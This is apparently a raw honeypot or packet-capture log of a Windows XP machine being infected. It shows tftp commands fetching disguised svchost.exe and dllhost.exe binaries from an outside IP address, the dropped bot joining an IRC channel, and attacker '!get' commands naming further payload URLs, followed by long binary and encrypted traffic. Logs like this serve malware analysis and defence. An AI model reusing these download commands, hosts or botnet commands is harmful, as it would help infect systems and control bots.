VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32>
VICTIM: tftp -i 180.229.72.81 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: Transfer successful: 35088 bytes in 15 seconds, 2339 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 180.229.72.81 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: Transfer successful: 25600 bytes in 11 seconds, 2327 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK tjtyupwpUSER g020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG tjtyupwp :!get http:/ad.ghura.pl/rus.php:u. PRIVMSG tjtyupwp :!get http:/sb.perfectexe.com/kp.gif
VICTIM: GET /rus.php HTTP/1.0User-Agent: DownloadHost: ad.ghura.plPragma: no-cache
VICTIM: \026\003\000\0007\001\000\0003\003\000\370\337e\254\343K\014D\200\343K\243\210(bd\210_\322\213\353\335\357\374\362\235\244O\201\000}\324W^\217|\2475x\251\322\341\344\333\032?\360C\236\032\311A\223d\t\334Z\tq\025\376Xc\236\250\351=\374D=n\222\246\357s\207\010\347>\226\214\262\302\3412\360?Sj\002\004\375\233\233\005\227\334X2B7\030\207\203\257\253\3420p\303D\020z\026\202\000'\277R\347\261\263\032\010\351\315\235Ro\302\013\013F\270\305\007d\214\022-L-\361)\341\345\213\264\241\307m\255\240\221\341%\027~\224\317O\206\243\177kuB5\242\371\025\220\322\311G\262\324\366\365\205\3236M\200\347\331\222)\267;g\366Sz\335\233\004%\263g\034\207\332q\244\342(2\373\026\207O(\203:\303\035)e\337 \$y@\254D-\217\253\2671~\303\2077b\244\000
VICTIM: \026\003\000\0007\001\000\0003\003\000\001\001\001\001\000
VICTIM: \026\003\000\0007\001\000\0003\003\000\001\001\001\001\000
VICTIM: 9\200\3220\231\214\025\252J\365\253l7\016\360\335\325\331\347\001&V\220\326'\202\351[\330`\363\221:\355\254vK+\026\014\016\0332U\202\273\377N\250\014|\367|\251P\001\276\206Y7 \023\023\0363T\200\266\370E\235\000n\346j\371\2227\347\242g8\024\372\354\351\362\005\$N\203\302c\303/\246(\264L\356\234U\030\347\301\246\225\220\227\250\305\355\037]\246\372X\3027\267A\327x\$\332\234h@#\020\t\016\0368^\217\313\021c\300(\232\030\2414\323}2\361\274\221r^UWe~\241\320\tN\236\371_\320L\322d\001\251[\031\342\265\224~rs\177\226\270\345\034_\255\005i\330Q\326f\001\247W\023\332\253\210pb`j\177\236\311\377?\213\342C\260(\2538\321u#\335\242rM2#\037'9W\200\263\362<\220\360[\321Q\335t\026\302z=\013\344\310\266\260\266\306\342\t:w\277\022o\330
VICTIM: \026\003\000\0007\001\000\0003\003\000\001\001\001\001\000
VICTIM: \331\331\351\034^\256\017\211\021\253R\005\310\230vaZ`s\223\301\373B\225\366d\340h\374\234H\001\306\231ygcn\206\253\334\032f\300(\240'\273[\010\301\206W4 \034'S\217\330.\223\010\212\032\271f&\364\317\270\257\264\307\347\024O\230\360U\307E\321j\021\306\210X6\\033#9\\\214\310\022j\320D\305T\357\227L\016\334\267\240\226\233\255\315\3736~\3234\242\036\250?\344\226T\037\366\333\314\312\325\354\020A~\310 \206\372{\t\243J\376\300\220nYRXk\213\267\3606\211\352W\321Y\360\225G\005\320\251\217\201\177\213\245\313\376=\212\344K\276>\313f\017\305\210W4\036\025\033/P\177\273\004Z\2760\260=\331\2018\374\315\252\225\214\221\242\277\351\037c\264\023\200\372\202\027\270g#\356\306\254\237\240\257\314\366-q\302 \214\005\213\035\274g\037\343\263\220zrx\213\253\332\027b\272 \223\023\240:\342\227
VICTIM: \026\003\000\0007\001\000\0003\003\000\001\001\001\001\000
VICTIM: \026\003\000\0007\001\000\0003\003\000\001\001\001\001\000
VICTIM: \373\016/^\235\353G\262,\264J\355\236])\004\356\346\356\005*\\\234\352F\260(\257E\352\236`0\016\371\362\372\0203e\246\366U\302=\307_\006\272}N,\030\024 :c\233\3415\226\005\203\016\250Q\t\320\245\210yw\204\236\306\374A\226\371k\354|\033\307\203M%\013\377\002\0245d\242\356H\260&\2519\327\203=\006\334\300\261\257\273\325\3741s\302\037\211\000\205\027\270h&\362\315\265\252\256\300\337\014G\220\347N\303F\330x%\340\251\200fY[k\213\273\371E\236\005z\374\213(\323\214S'\010\367\363\375\0249l\254\371T\2742\266I\352\231V \367\334\316\316\334\371%_\247\374_\320P\336{&\337\245|bW[n\217\276\374G\240\010~\003\227:\353\252wR;3;Sy\256\360@\237\013\205\014\243I\375\277\217mYT]t\231\316\020a\300-\2513\314s(\354\276\237\216\216\234\271\343\035f\276%
VICTIM: \270\210eOIRj\217\300\374D\227\366`\326W\344|\037\316\210N\213\324'\204\353\\\327\\\353\204(\326\216P\034\362\323\276\263\263\275\322\361\032M\212\321#\177\345U\317T\343|\037\314\203E\021\347\307\261\245\245\257\303\341\t;x\277\020k\320@\272>\314d\006\262h)\364\311\250\221\204\202\213\236\273\342\023O\225\345?\243\021\213\023\250\206snw\216\264\347's\314>\310a\010\276\3612\203\341L\305K\351\240e8\$\0Lu\254\361C\243\021\214\024\252N\000\277\213dK?BQm\226\313\014Y\262\027\210\t\2305\340\231_1\022\002\002\020*Q\205\305\021j\323K\321e\006\266t?\027\374\357\361\001 N\212\325.\226\014\221%\310w6\004\351\352\371\025@y\300\025y\352m\007\260g-\000\340\316\312\325\354\020A\200\316)\221\006\211\031\266n>\034\t\003\013\0359`\221\314\021`\271\034\211\001\203\017\245E\360\245d